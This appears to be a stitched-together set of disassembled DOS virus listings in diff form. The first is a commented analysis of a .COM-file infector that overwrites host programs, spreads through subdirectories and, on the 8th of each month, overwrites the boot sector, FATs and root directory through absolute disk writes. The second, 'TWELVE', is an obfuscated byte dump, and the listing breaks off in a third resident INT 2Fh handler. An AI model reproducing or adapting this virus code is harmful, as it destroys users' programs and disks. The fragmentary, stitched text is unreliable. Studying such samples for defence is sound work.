mov ds:data_12e,al ; (76AC:0114=0BAh)
|
||||
mov ds:data_17e,al ; (76AC:0143=3Dh)
|
||||
mov ah,47h
|
||||
mov dl,0
|
||||
mov si,116h
|
||||
int 21h ; DOS Services ah=function 47h
|
||||
; get full pathname for current drive
|
||||
; putting it in the buffer pointed to by SI
|
||||
push ds
|
||||
mov ax,0
|
||||
mov ds,ax
|
||||
mov al,ds:data_3e ; (0000:0475=2)
|
||||
pop ds
|
||||
mov ds:data_16e,al ; (76AC:0142=0B4h)
|
||||
cmp al,0
|
||||
je loc_3 ; Jump if equal (drive c)
|
||||
mov ah,0Eh
|
||||
mov dl,2
|
||||
mov ds:data_17e,dl ; (76AC:0143=3Dh)
|
||||
int 21h ; DOS Services ah=function 0Eh
|
||||
; set default drive C:
|
||||
loc_3:
|
||||
mov ah,3Bh ; ';'
|
||||
mov dx,10Fh
|
||||
int 21h ; DOS Services ah=function 3Bh
|
||||
; set current dir, path \
|
||||
loc_4:
|
||||
mov ah,4Eh ; 'N'
|
||||
mov cx,3
|
||||
mov dx,107h
|
||||
int 21h ; DOS Services ah=function 4Eh
|
||||
; find 1st filenam match (*.com)
|
||||
jnc loc_5 ; Jump if carry=0 (if found)
|
||||
jmp loc_8
|
||||
loc_5:
|
||||
mov ax,ds:data_8e ; (76AC:0096=58h)
|
||||
and ax,1Fh
|
||||
cmp al,1Fh
|
||||
jne loc_6 ; Jump if not equal
|
||||
jmp loc_7
|
||||
loc_6:
|
||||
; Now it has found a .COM file, opens it then writes itself to it
|
||||
; and here it makes it's biggest mistake: it writes itself to the OS files,
|
||||
; leaving them inoperational
|
||||
|
||||
mov ax,ds:data_10e ; (76AC:009A=2601h)
|
||||
mov ds:data_15e,ax ; (76AC:0140=21CDh)
|
||||
mov ah,43h ; 'C'
|
||||
mov al,1
|
||||
mov cl,ds:data_7e ; (76AC:0095=0A1h)
|
||||
and cx,0FEh
|
||||
mov dx,9Eh
|
||||
int 21h ; DOS Services ah=function 43h
|
||||
; get/set file attrb, file found
|
||||
mov ah,3Dh ; '='
|
||||
mov al,2
|
||||
mov dx,9Eh
|
||||
int 21h ; DOS Services ah=function 3Dh
|
||||
; open file, al=mode,name@ds:dx
|
||||
mov bx,ax
|
||||
mov ah,3Fh ; '?'
|
||||
mov cx,2E7h
|
||||
mov dx,0F800h
|
||||
int 21h ; DOS Services ah=function 3Fh
|
||||
; read file, cx=bytes, to ds:dx
|
||||
mov ah,42h ; 'B'
|
||||
mov al,0
|
||||
mov cx,0
|
||||
mov dx,0
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
mov ah,40h ; '@'
|
||||
mov cx,2E7h
|
||||
mov dx,100h
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file cx=bytes, to ds:dx
|
||||
mov ah,42h ; 'B'
|
||||
mov al,2
|
||||
mov cx,0
|
||||
mov dx,0
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
mov ah,40h ; '@'
|
||||
mov cx,2E7h
|
||||
mov dx,0F800h
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file cx=bytes, to ds:dx
|
||||
mov ah,57h ; 'W'
|
||||
mov al,1
|
||||
mov cx,ds:data_8e ; (76AC:0096=58h)
|
||||
mov dx,ds:data_9e ; (76AC:0098=44A3h)
|
||||
or cl,1Fh
|
||||
int 21h ; DOS Services ah=function 57h
|
||||
; get/set file date & time
|
||||
mov ah,43h ; 'C'
|
||||
mov al,1
|
||||
mov cl,ds:data_7e ; (76AC:0095=0A1h)
|
||||
mov dx,9Eh
|
||||
int 21h ; DOS Services ah=function 43h
|
||||
; get/set file attrb, nam@ds:dx
|
||||
mov ah,3Eh ; '>'
|
||||
int 21h ; DOS Services ah=function 3Eh
|
||||
; close file, bx=file handle
|
||||
inc byte ptr ds:data_13e ; (76AC:013E=9Eh)
|
||||
cmp byte ptr ds:data_13e,3 ; (76AC:013E=9Eh)
|
||||
je loc_15 ; Jump if equal
|
||||
loc_7:
|
||||
mov ah,4Fh ; 'O'
|
||||
int 21h ; DOS Services ah=function 4Fh
|
||||
; find next filename match
|
||||
jc loc_8 ; Jump if carry Set (if no more .com files)
|
||||
jmp loc_5 ; infect next file
|
||||
|
||||
loc_8:
|
||||
; Now (I'm not sure about this) I think it's looking for subdirectories, so it can spread there
|
||||
; too.
|
||||
mov ah,4Eh ; 'N'
|
||||
mov dx,10Dh
|
||||
mov cx,12h
|
||||
int 21h ; DOS Services ah=function 4Eh
|
||||
; find 1st filenam match @ds:dx
|
||||
jc loc_13 ; Jump if carry Set
|
||||
|
||||
loc_9:
|
||||
cmp byte ptr ds:data_11e,2Eh ; (76AC:009E=0) '.'
|
||||
jne loc_11 ; Jump if not equal
|
||||
loc_10:
|
||||
mov ah,4Fh ; 'O'
|
||||
int 21h ; DOS Services ah=function 4Fh
|
||||
; find next filename match
|
||||
jnc loc_9 ; Jump if carry=0
|
||||
jmp short loc_13
|
||||
loc_11:
|
||||
mov ah,3Bh ; ';'
|
||||
mov dx,9Eh
|
||||
int 21h ; DOS Services ah=function 3Bh
|
||||
; set current dir, path @ ds:dx
|
||||
jc loc_10 ; Jump if carry Set
|
||||
mov cx,0Bh
|
||||
mov si,0
|
||||
mov bx,80h
|
||||
|
||||
locloop_12:
|
||||
mov ax,[bx+si]
|
||||
push ax
|
||||
inc si
|
||||
inc si
|
||||
loop locloop_12 ; Loop if cx > 0
|
||||
|
||||
inc byte ptr ds:data_14e ; (76AC:013F=0)
|
||||
jmp loc_4
|
||||
; yes, it should have been directories, for now it has changed the path and has gone
|
||||
; off infecting files again
|
||||
loc_13:
|
||||
; if it has found them all, it goes on to the next wickedness...
|
||||
cmp byte ptr ds:data_14e,0 ; (76AC:013F=0)
|
||||
je loc_15 ; Jump if equal
|
||||
dec byte ptr ds:data_14e ; (76AC:013F=0)
|
||||
mov ah,3Bh ; ';'
|
||||
mov dx,111h
|
||||
int 21h ; DOS Services ah=function 3Bh
|
||||
; set current dir, path @ ds:dx
|
||||
mov cx,0Bh
|
||||
mov di,14h
|
||||
mov bx,80h
|
||||
|
||||
locloop_14:
|
||||
pop ax
|
||||
mov [bx+di],ax
|
||||
dec di
|
||||
dec di
|
||||
loop locloop_14 ; Loop if cx > 0
|
||||
|
||||
mov ah,4Fh ; 'O'
|
||||
int 21h ; DOS Services ah=function 4Fh
|
||||
; find next filename match
|
||||
jc loc_13 ; Jump if carry Set
|
||||
jmp short loc_9
|
||||
loc_15:
|
||||
; Finally, it it wasn't bugged and very amateurish
|
||||
; (making the infected files useless)
|
||||
; it would check for a date and then destroy the current disk if it was that date
|
||||
; ( The 8 of each month. Why???)
|
||||
mov ah,2Ah ; '*'
|
||||
int 21h ; DOS Services ah=function 2Ah
|
||||
; get date, cx=year, dx=mon/day
|
||||
cmp dl,8
|
||||
jne loc_16 ; Jump if not equal
|
||||
mov byte ptr ds:data_20e,1 ; (76AC:0148=0)
|
||||
mov al,ds:data_17e ; (76AC:0143=3Dh)
|
||||
mov cx,0A0h
|
||||
mov dx,0
|
||||
mov bx,0
|
||||
int 26h ; Absolute disk write, drive al
|
||||
; Write over the boot sector (and the partition table, if it's a hard disk),
|
||||
;the root directory and probably both FATs (if the DOS partition is the first
|
||||
; on the HD, off course), then try doing the same to second HD)
|
||||
popf ; Pop flags
|
||||
cmp byte ptr ds:data_16e,2 ; (76AC:0142=0B4h)
|
||||
jne loc_17 ; Jump if not equal
|
||||
mov al,3
|
||||
mov cx,0A0h
|
||||
mov dx,0
|
||||
mov bx,0
|
||||
int 26h ; Absolute disk write, drive al
|
||||
popf ; Pop flags
|
||||
jmp short loc_17
|
||||
loc_16:
|
||||
mov ah,0Eh
|
||||
mov dl,ds:data_12e ; (76AC:0114=0BAh)
|
||||
int 21h ; DOS Services ah=function 0Eh
|
||||
; set default drive dl (0=a:)
|
||||
mov ah,3Bh ; ';'
|
||||
mov dx,115h
|
||||
int 21h ; DOS Services ah=function 3Bh
|
||||
; set current dir, path @ ds:dx
|
||||
; Now change the interrupts again
|
||||
loc_17:
|
||||
cli ; Disable interrupts
|
||||
push es
|
||||
mov ax,0
|
||||
mov es,ax
|
||||
mov ax,ds:data_18e ; (76AC:0144=2B0h)
|
||||
mov es:data_1e,ax ; (0000:0058=0A9Ch)
|
||||
mov ax,ds:data_19e ; (76AC:0146=9EBAh)
|
||||
mov es:data_2e,ax ; (0000:005A=0D81h)
|
||||
pop es
|
||||
in al,21h ; port 21h, 8259-1 int IMR
|
||||
and al,0FDh
|
||||
out 21h,al ; port 21h, 8259-1 int comands
|
||||
sti ; Enable interrupts
|
||||
cmp byte ptr ds:data_20e,1 ; (76AC:0148=0)
|
||||
jne loc_20 ; Jump if not equal
|
||||
mov cx,2Ch
|
||||
mov di,0
|
||||
mov bx,14Bh
|
||||
|
||||
locloop_18:
|
||||
xor byte ptr [bx+di],0AAh
|
||||
inc di
|
||||
loop locloop_18 ; Loop if cx > 0
|
||||
|
||||
mov cx,10h
|
||||
mov di,0
|
||||
mov bx,17Ah
|
||||
|
||||
locloop_19:
|
||||
; Finally write something on the screen, it seems like blanks
|
||||
; wait for for a keypress (doesn't matter which) then jump somewhere I can't understand.
|
||||
|
||||
xor byte ptr [bx+di],0AAh
|
||||
inc di
|
||||
loop locloop_19 ; Loop if cx > 0
|
||||
|
||||
mov ah,9
|
||||
mov dx,data_21e ; (76AC:014B=8Bh)
|
||||
int 21h ; DOS Services ah=function 09h
|
||||
; display char string at ds:dx
|
||||
mov ah,9
|
||||
mov dx,data_22e ; (76AC:017A=40h)
|
||||
int 21h ; DOS Services ah=function 09h
|
||||
; display char string at ds:dx
|
||||
mov ah,7
|
||||
int 21h ; DOS Services ah=function 07h
|
||||
; get keybd char al, no echo
|
||||
loc_20:
|
||||
mov cx,80h
|
||||
mov di,0FEh
|
||||
mov bx,80h
|
||||
|
||||
locloop_21:
|
||||
pop ax
|
||||
mov [bx+di],ax
|
||||
dec di
|
||||
dec di
|
||||
loop locloop_21 ; Loop if cx > 0
|
||||
|
||||
mov cx,8
|
||||
mov si,3DFh
|
||||
mov di,0F800h
|
||||
cld ; Clear direction
|
||||
rep movsb ; Rep while cx>0 Mov [si] to es:[di]
|
||||
mov cx,2E7h
|
||||
mov si,ds:data_15e ; (76AC:0140=21CDh)
|
||||
add si,100h
|
||||
jmp $+0 ;replaced a jump to an inexistant loc_22
|
||||
db 0BFh, 0, 1, 0F3h, 0A4h, 0E9h
|
||||
db 0F8h, 8, 0EBh
|
||||
db 5Dh
|
||||
db 93 dup (90h)
|
||||
db 0B8h, 0, 0, 0CDh, 21h
|
||||
db 643 dup (0)
|
||||
|
||||
tw endp
|
||||
|
||||
code_seg_a ends
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
|
@ -0,0 +1,302 @@
|
|||
PAGE 59,132
|
||||
|
||||
;ロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロ
|
||||
;ロロ ロロ
|
||||
;ロロ TWELVE ロロ
|
||||
;ロロ ロロ
|
||||
;ロロ Created: 26-Apr-90 ロロ
|
||||
;ロロ Version: ロロ
|
||||
;ロロ Passes: 5 Analysis Options on: H ロロ
|
||||
;ロロ ロロ
|
||||
;ロロ ロロ
|
||||
;ロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロ
|
||||
|
||||
data_1e equ 3366h ; (7415:3366=0)
|
||||
data_2e equ 7EF7h ; (7415:7EF7=0)
|
||||
data_3e equ 8C8Dh ; (7415:8C8D=0)
|
||||
|
||||
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
|
||||
org 100h
|
||||
|
||||
twelve proc far
|
||||
|
||||
start:
|
||||
;* jmp $+4h ;*
|
||||
db 0E9h, 1, 0
|
||||
db 21h, 46h, 0B8h, 9Bh, 1Ah, 0BFh
|
||||
db 2Bh, 1, 90h, 4Bh, 0F8h, 0FCh
|
||||
db 0B9h, 71h, 5, 31h, 0Dh, 2Bh
|
||||
db 0DAh, 33h, 0D9h, 2Bh, 0D9h, 2Bh
|
||||
db 0D8h, 90h, 33h, 0D1h, 31h, 5
|
||||
db 46h, 43h, 0F8h, 40h, 90h, 47h
|
||||
db 0E2h, 0E9h, 40h, 40h, 61h, 1Fh
|
||||
db 6Eh, 3, 0C9h, 82h, 6Fh, 36h
|
||||
db 0D1h, 5Ah, 8Bh, 33h, 0C3h, 6Bh
|
||||
db 0D5h, 0D7h, 85h, 0CCh, 17h, 4Eh
|
||||
db 0E9h, 0F3h, 7Ch, 0B1h, 29h, 52h
|
||||
db 0FBh, 0FFh, 74h, 0B5h, 2Bh, 56h
|
||||
db 0F9h, 0F3h, 64h, 0A9h, 0Dh, 32h
|
||||
db 9Bh, 97h, 1Ch, 0D5h, 7Fh, 64h
|
||||
db 82h, 7Bh, 0ADh, 94h, 1Eh, 61h
|
||||
db 6Ch, 29h, 7Dh, 0F3h, 4Ah, 0F7h
|
||||
db 0F4h, 4Ah, 0FEh, 0FFh, 1, 0
|
||||
db 51h, 7Ch, 7, 47h, 0DDh, 22h
|
||||
db 0CCh, 0EFh, 0D5h, 1Bh, 0F2h, 81h
|
||||
db 0DEh, 36h, 5Fh, 0D1h, 0D3h, 63h
|
||||
db 0FAh, 1Eh, 0CCh, 23h, 0E1h, 76h
|
||||
db 0ABh, 0Bh, 39h, 5Ch, 0DEh, 0B9h
|
||||
db 3, 0F4h, 7Eh, 21h, 74h, 31h
|
||||
db 0Ch, 0EFh, 59h, 9, 0D9h, 37h
|
||||
db 12h, 44h, 92h, 18h, 30h, 12h
|
||||
db 0ABh, 16h, 14h, 4Ch, 0BAh, 6Eh
|
||||
db 2Bh, 6Fh, 0F5h, 5Bh, 4Ch, 0F3h
|
||||
db 7Dh, 0Dh, 53h, 4Ah, 0F1h, 0F7h
|
||||
db 59h, 5Dh, 98h, 2, 0Fh, 29h
|
||||
db 8Bh, 0D0h, 5Ch, 0ADh, 29h, 54h
|
||||
db 3, 52h, 13h, 76h, 0D5h, 58h
|
||||
db 13h, 4, 0D7h, 63h, 39h, 74h
|
||||
db 8Bh, 7, 0FDh, 8Ah, 0F9h, 1Ah
|
||||
db 0D1h, 0F5h, 39h, 0EDh, 0BBh, 0C9h
|
||||
db 63h, 8Dh, 0B9h, 97h, 1Eh, 6Dh
|
||||
db 0BBh, 14h, 0EBh, 67h, 14h, 50h
|
||||
db 34h, 93h, 41h, 0D3h, 0D6h, 87h
|
||||
db 0FEh, 0CBh, 0F5h, 87h, 0F9h, 55h
|
||||
db 16h, 7, 39h, 49h, 0F5h, 0F3h
|
||||
db 0B6h, 0F0h, 64h, 0A5h, 21h, 57h
|
||||
db 28h, 2Ch, 0A9h, 0DCh, 6Dh, 8Fh
|
||||
db 7Fh, 5Eh, 0ABh, 21h, 66h, 1Ch
|
||||
db 6Ch, 35h, 63h, 0F7h, 4Ch, 0F5h
|
||||
db 0FDh, 0Ch, 59h, 78h, 6, 43h
|
||||
db 0BBh, 78h, 3Bh, 6Eh, 2Fh, 0B2h
|
||||
db 15h, 0AEh, 16h, 13h, 0D0h, 3Eh
|
||||
db 0F6h, 15h, 85h, 0DBh, 0A1h, 5Ch
|
||||
db 20h, 0CEh, 9Eh, 0F0h, 1Eh, 68h
|
||||
db 39h, 78h, 79h, 8, 0FDh, 0D7h
|
||||
db 0EAh, 0CBh, 0EAh, 87h, 0, 6Eh
|
||||
db 51h, 28h, 0D5h, 0D7h, 2Dh, 0A7h
|
||||
db 38h, 5Ch, 61h, 28h, 0D5h, 0DDh
|
||||
db 0A1h, 0Dh, 66h, 91h, 1Fh, 0A5h
|
||||
db 74h, 31h, 0Ah, 0F3h, 51h, 55h
|
||||
db 0C1h, 0F3h, 80h, 0Dh, 0ABh, 4Bh
|
||||
db 0EDh, 0ACh, 66h, 45h, 14h, 55h
|
||||
db 34h, 93h, 50h, 0BEh, 14h, 0DDh
|
||||
db 63h, 2Fh, 94h, 0D0h, 6Ch, 0Eh
|
||||
db 13h, 0Ch, 7Eh, 21h, 74h, 31h
|
||||
db 5Ch, 0FFh, 30h, 0D2h, 4Dh, 0F5h
|
||||
db 0C8h, 78h, 3Bh, 6Eh, 2Fh, 72h
|
||||
db 0D5h, 1Ah, 0F4h, 0A0h, 0D9h, 36h
|
||||
db 0B5h, 0D2h, 19h, 5Ch, 0Dh, 6Bh
|
||||
db 0EDh, 0B8h, 20h, 0D2h, 7Ch, 0B9h
|
||||
db 0Dh, 7Ah, 0ABh, 5, 49h, 0CCh
|
||||
db 4Ch, 0F4h, 0F5h, 78h, 3Bh, 6Eh
|
||||
db 2Fh, 83h, 12h, 0DDh, 33h, 0D8h
|
||||
db 41h, 31h, 0, 0D8h, 0E7h, 0D8h
|
||||
db 11h, 14h, 26h, 0ADh, 0DAh, 0E2h
|
||||
db 39h, 8Fh, 35h, 0F1h, 0BFh, 33h
|
||||
db 0CCh, 7Bh, 0F5h, 0F7h, 4Fh, 0F3h
|
||||
db 0EDh, 22h, 0CCh, 0A0h, 0D6h, 3Eh
|
||||
db 0C0h, 0D2h, 11h, 55h, 4, 1Fh
|
||||
db 0Ah, 83h, 1Dh, 82h, 21h, 6Ah
|
||||
db 45h, 0F0h, 0F5h, 3Bh, 15h, 9Ah
|
||||
db 79h, 6Bh, 0FDh, 72h, 34h, 2Ah
|
||||
db 0F1h, 3Fh, 89h, 0, 13h, 5Fh
|
||||
db 0E1h, 62h, 7Ah, 3Ch, 9Eh, 53h
|
||||
db 0Fh, 88h, 98h, 23h, 0B9h, 5Eh
|
||||
db 0CCh, 0DCh, 3Ch, 3Fh, 0Bh, 80h
|
||||
db 0A3h, 3, 31h, 3Eh, 0D4h, 0D7h
|
||||
db 0F4h, 3Bh, 3Dh, 0B0h, 0ABh, 1Fh
|
||||
db 21h, 34h, 17h, 28h, 0D5h, 1Fh
|
||||
db 0F9h, 0FEh, 18h, 0D7h, 19h, 1Bh
|
||||
db 90h, 95h, 5, 23h, 6Ah, 0FDh
|
||||
db 71h, 0F0h, 0F5h, 0AAh, 31h, 0FFh
|
||||
db 7Ch, 32h, 0D2h, 0F6h, 7Ch, 7Fh
|
||||
db 0ECh, 0EFh, 21h, 83h, 6Dh, 0EDh
|
||||
db 15h, 98h, 5Bh, 0EFh, 0D1h, 2Dh
|
||||
db 0A2h, 51h, 0FFh, 9Ah, 69h, 0EBh
|
||||
db 0EDh, 3Fh, 1Ch, 95h, 0Bh, 3Fh
|
||||
db 0FEh, 7Dh, 12h, 2Eh, 0F6h, 3Bh
|
||||
db 25h, 0A8h, 33h, 6Eh, 2Eh, 0F4h
|
||||
db 0D5h, 10h, 93h, 35h, 0DAh, 0DFh
|
||||
db 35h, 0C7h, 0D4h, 5Eh, 0ABh, 3Dh
|
||||
db 6Ch, 2Ch, 0FDh, 0F3h, 39h, 0D1h
|
||||
db 14h, 0B5h, 1Bh, 7Ch, 0FDh, 3Fh
|
||||
db 0B9h, 53h, 0F4h, 0F2h, 6Ch, 2Ch
|
||||
db 0FDh, 93h, 59h, 20h, 0CAh, 6Bh
|
||||
db 9Dh, 26h, 9Fh, 93h, 1Eh, 0E1h
|
||||
db 79h, 5Fh, 17h, 94h, 2Bh, 0D6h
|
||||
db 0F5h, 4, 51h, 78h, 0BBh, 11h
|
||||
db 0D6h, 34h, 0BAh, 5Dh, 7Eh, 0BDh
|
||||
db 1, 6Eh, 4, 65h, 0D6h, 0ECh
|
||||
db 1Ah, 0A7h, 0D4h, 65h, 0DDh, 0D3h
|
||||
db 3Dh, 61h, 0D5h, 38h, 0, 23h
|
||||
db 66h, 85h, 19h, 0A1h, 7Eh, 0Dh
|
||||
db 31h, 5Eh, 0E5h, 0CAh, 0F5h, 76h
|
||||
db 33h, 0A4h, 0EDh, 23h, 0D1h, 0AEh
|
||||
db 0D3h, 18h, 16h, 99h, 0CBh, 0EDh
|
||||
db 0B8h, 4Ch, 4Fh, 0FEh, 86h, 12h
|
||||
db 0E9h, 0E9h, 0EDh, 0A3h, 0Ah, 15h
|
||||
db 39h, 1Ah, 66h, 0DCh, 0C0h, 1Fh
|
||||
db 0F1h, 3Bh, 96h, 0E5h, 0F1h, 57h
|
||||
db 0EDh, 91h, 6Ch, 0D7h, 0D5h, 69h
|
||||
db 0DDh, 0DFh, 10h, 0F2h, 0A7h, 0D8h
|
||||
db 61h, 93h, 54h, 0ECh, 0EDh, 3Fh
|
||||
db 21h, 0A8h, 23h, 72h, 3Fh, 6Ch
|
||||
db 0FDh, 3Eh, 0D4h, 7Ch, 0A3h, 9
|
||||
db 66h, 0A1h, 15h, 12h, 74h, 77h
|
||||
db 6Ah, 12h, 54h, 80h, 9Dh, 2Bh
|
||||
db 94h, 0C0h, 58h, 0B2h, 59h, 0D1h
|
||||
db 20h, 0D2h, 4Dh, 0F6h, 0B6h, 78h
|
||||
db 0B3h, 9, 76h, 25h, 74h, 35h
|
||||
db 54h, 0F3h, 20h, 0CEh, 0F3h, 58h
|
||||
db 83h, 2Bh, 5Bh, 8Dh, 23h, 6Bh
|
||||
db 0C7h, 1Eh, 0F4h, 0C8h, 8Ch, 0E0h
|
||||
db 2Dh, 0DCh, 36h, 0C0h, 27h, 0C4h
|
||||
db 3, 78h, 18h, 40h, 0FDh, 0F2h
|
||||
db 0A2h, 1Fh, 5Bh, 0F3h, 2Eh, 64h
|
||||
db 0A3h, 0E3h, 94h, 0E6h, 29h, 92h
|
||||
db 9Ch, 0DEh, 55h, 81h, 0C4h, 0DEh
|
||||
db 0C4h, 0DAh, 3Ch, 26h, 64h, 0BDh
|
||||
db 5, 76h, 14h, 0F4h, 0FDh, 0AEh
|
||||
db 0BCh, 0C0h, 35h, 0Eh, 26h, 23h
|
||||
db 0B4h, 2Ch, 0B5h, 83h, 16h, 3Fh
|
||||
db 0Ch, 2Ch, 58h, 0Fh, 0A8h, 2Ah
|
||||
db 0DEh, 7, 5Eh, 12h
|
||||
loc_1:
|
||||
cmp al,0Fh
|
||||
mov bp,7E24h
|
||||
aas ; Ascii adjust
|
||||
lodsw ; String [si] to ax
|
||||
mov bl,2Ah ; '*'
|
||||
cld ; Clear direction
|
||||
mov bx,7E1Fh
|
||||
pop es
|
||||
push es
|
||||
push di
|
||||
db 2Eh, 55h, 0EDh, 93h, 7Dh, 49h
|
||||
db 6Ah, 18h, 5Fh, 0BCh, 0DBh, 75h
|
||||
db 0AEh, 0D1h, 73h, 0E6h, 1Eh, 2Ch
|
||||
db 0BEh, 78h, 29h, 0A7h, 0A3h
|
||||
db 78h
|
||||
|
||||
locloop_2:
|
||||
mov bh,ch
|
||||
add dh,ds:data_2e[si] ; (7415:7EF7=0)
|
||||
adc word ptr [bx],41h
|
||||
esc 7,cl ; coprocessor escape
|
||||
pop cx
|
||||
xchg ax,dx
|
||||
rcr cl,1 ; Rotate thru carry
|
||||
rcl byte ptr [di-68h],cl ; Rotate thru carry
|
||||
esc 2,ds:data_3e[di] ; (7415:8C8D=0) coprocessor escape
|
||||
sbb al,ds:data_1e[bx+si] ; (7415:3366=0)
|
||||
loc_3:
|
||||
mov bp,7EA5h
|
||||
adc word ptr [bx+di],0CD5Fh
|
||||
sti ; Enable interrupts
|
||||
ja loc_1 ; Jump if above
|
||||
db 0F2h, 0D3h, 0Bh, 7Bh, 0AAh, 0E8h
|
||||
db 0B3h
|
||||
db 4Bh, 4Dh
|
||||
loc_5:
|
||||
esc 3,[bp+si+4E0Eh] ; coprocessor escape
|
||||
movsb ; Mov [si] to es:[di]
|
||||
push ds
|
||||
adc [bp+0Bh],al
|
||||
popf ; Pop flags
|
||||
push si
|
||||
add al,dl
|
||||
db 6Fh, 0F3h, 0Fh, 54h, 0F9h, 0F3h
|
||||
db 76h, 0B9h, 11h, 0DEh, 90h, 0F7h
|
||||
db 56h, 0F7h, 0EDh
|
||||
loc_6:
|
||||
loopz locloop_2 ; Loop if zf=1, cx>0
|
||||
|
||||
;* jo loc_4 ;*Jump if overflow=1
|
||||
db 70h, 0D3h
|
||||
xlat [bx] ; al=[al+[bx]] table
|
||||
jbe loc_5 ; Jump if below or =
|
||||
esc 5,[si] ; coprocessor escape
|
||||
test cx,sp
|
||||
dec ax
|
||||
adc al,49h ; 'I'
|
||||
int 0BDh
|
||||
push di
|
||||
in ax,dx ; port 0, DMA-1 bas&add ch 0
|
||||
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
|
||||
call $-4A7Fh
|
||||
sbb ax,5E05h
|
||||
push bp
|
||||
jl loc_3 ; Jump if <
|
||||
das ; Decimal adjust
|
||||
dec si
|
||||
;* jmp short loc_7 ;*(04BD)
|
||||
db 0EBh, 0EDh
|
||||
db 18h, 0D3h, 49h, 36h, 95h, 9Dh
|
||||
db 14h, 0DBh, 71h, 36h, 99h, 95h
|
||||
db 68h, 0B5h, 0F0h, 70h, 30h, 4Ah
|
||||
db 0DCh, 0F4h, 4Bh, 66h, 0E5h, 44h
|
||||
db 82h, 0F0h, 0Fh, 9, 0B5h, 0A6h
|
||||
db 7Fh, 0DCh, 0D6h, 0E4h, 0DAh, 0E6h
|
||||
db 2, 0EEh, 6, 0F6h, 0Bh, 0FEh
|
||||
db 0Eh, 0FEh
|
||||
db 9
|
||||
loc_8:
|
||||
jge loc_6 ; Jump if > or =
|
||||
stosb ; Store al to es:[di]
|
||||
mov al,0B3h
|
||||
mov ch,0Dh
|
||||
mov ax,1D6Dh
|
||||
sbb dh,al
|
||||
cmc ; Complement carry
|
||||
hlt ; Halt processor
|
||||
div al ; al, ah rem = ax/reg
|
||||
jmp short loc_8 ; (04FD)
|
||||
db 0E4h, 12h, 1Fh, 16h, 1Eh, 12h
|
||||
db 11h, 1Eh, 10h, 11h, 1Bh, 15h
|
||||
db 5, 11h, 0FFh, 0EDh, 0F9h, 0F1h
|
||||
db 0E3h, 0F5h, 0EDh, 0F1h, 0E7h, 0FEh
|
||||
db 0E1h, 0F2h, 0E8h, 0F6h, 0EBh, 0F2h
|
||||
db 0F2h, 0EEh, 0CDh, 0D2h, 0F4h, 0D6h
|
||||
db 0F7h, 0D2h, 0FEh, 0DEh, 0F9h, 58h
|
||||
db 9Bh, 3Fh, 5Eh, 95h, 7, 64h
|
||||
db 13h, 72h, 1Ah, 41h, 0F6h, 1Bh
|
||||
db 0DCh, 0FFh, 49h, 0B3h, 4Ch, 1Bh
|
||||
db 0F1h, 78h, 3Bh, 6Eh, 7, 4Eh
|
||||
db 96h, 5Ah, 0B4h, 0Fh, 0CDh, 14h
|
||||
db 0D3h, 7Bh, 1Eh, 0D1h, 7Fh, 18h
|
||||
db 13h, 6Eh, 2, 45h, 0F6h, 1Fh
|
||||
db 0F6h, 0F3h, 0A5h, 62h, 3Eh, 0C2h
|
||||
db 0F0h, 0C6h, 0F8h, 0B3h, 0AAh, 0Dh
|
||||
db 15h, 10h, 61h, 0D7h, 18h, 3Ah
|
||||
db 0DCh, 0DFh, 0F7h, 0FDh, 96h, 98h
|
||||
db 98h, 0D3h, 0BDh, 0AEh, 0B9h, 0BBh
|
||||
db 0C8h, 0B6h, 0B2h, 0B2h, 0AFh, 0D1h
|
||||
db 0BEh, 0BCh, 0B8h, 0F7h, 0F5h, 0BEh
|
||||
db 0EDh, 0EFh, 0EDh, 13h, 14h, 16h
|
||||
db 14h, 12h, 1Ch, 1Eh, 1Ch, 12h
|
||||
db 14h, 16h, 14h, 12h, 0ECh, 0EFh
|
||||
db 0EDh, 0F3h, 0F5h, 0F7h, 0F5h, 0F3h
|
||||
db 0FDh, 0FFh, 0FDh, 0F3h, 0F5h, 0F7h
|
||||
db 0F5h, 0F3h, 0EDh, 0EFh, 0EDh, 0D3h
|
||||
db 0D5h, 0D7h, 0D5h, 0D3h, 0DDh, 0DFh
|
||||
db 0DDh, 0D3h, 0D5h, 0D7h, 0D5h, 0D3h
|
||||
db 0EDh, 0EFh, 0EDh, 0F3h, 0F5h, 0F4h
|
||||
db 0CAh, 0CCh, 0C2h, 0C0h, 0C2h, 0CCh
|
||||
db 0CAh, 0C8h, 0B6h, 0BCh, 0A0h, 0ECh
|
||||
db 0E3h, 93h, 95h, 97h, 29h, 5Fh
|
||||
db 0B6h, 9Fh, 0BDh, 58h, 0Fh, 0Dh
|
||||
db 81h, 97h, 0EDh, 0EFh, 0EDh, 0B2h
|
||||
db 0B2h, 0B6h, 0A7h, 0DDh, 0BEh, 0B0h
|
||||
db 0B0h, 0F3h, 0F5h, 0BAh, 0F5h, 0F3h
|
||||
db 0EDh, 0EFh, 0EDh
|
||||
|
||||
twelve endp
|
||||
|
||||
seg_a ends
|
||||
|
||||
|
||||
|
||||
end start
|
|
@ -0,0 +1,59 @@
|
|||
SEG_A segment byte public
|
||||
assume cs:seg_a,ds:seg_a
|
||||
org 100h
|
||||
|
||||
MULTIPLEXOR proc far
|
||||
start:
|
||||
jmp BEGIN
|
||||
MULTIPLEXOR endp
|
||||
|
||||
; Subroutine work on the DOS Int2Fh (Multiplexor)
|
||||
; It stay rezident and calling Old Int2Fh, if don't call FnBAh.
|
||||
; Functions (ah=BAh): ³ Return:
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; al=0 ³ al=0ffh, bl=READ_ON
|
||||
; al=1 ³ bl=READ_ON=1
|
||||
; al=2 ³ bl=READ_ON=0
|
||||
; al=3 ³ Calling WRITE; bl=READ_ON=1
|
||||
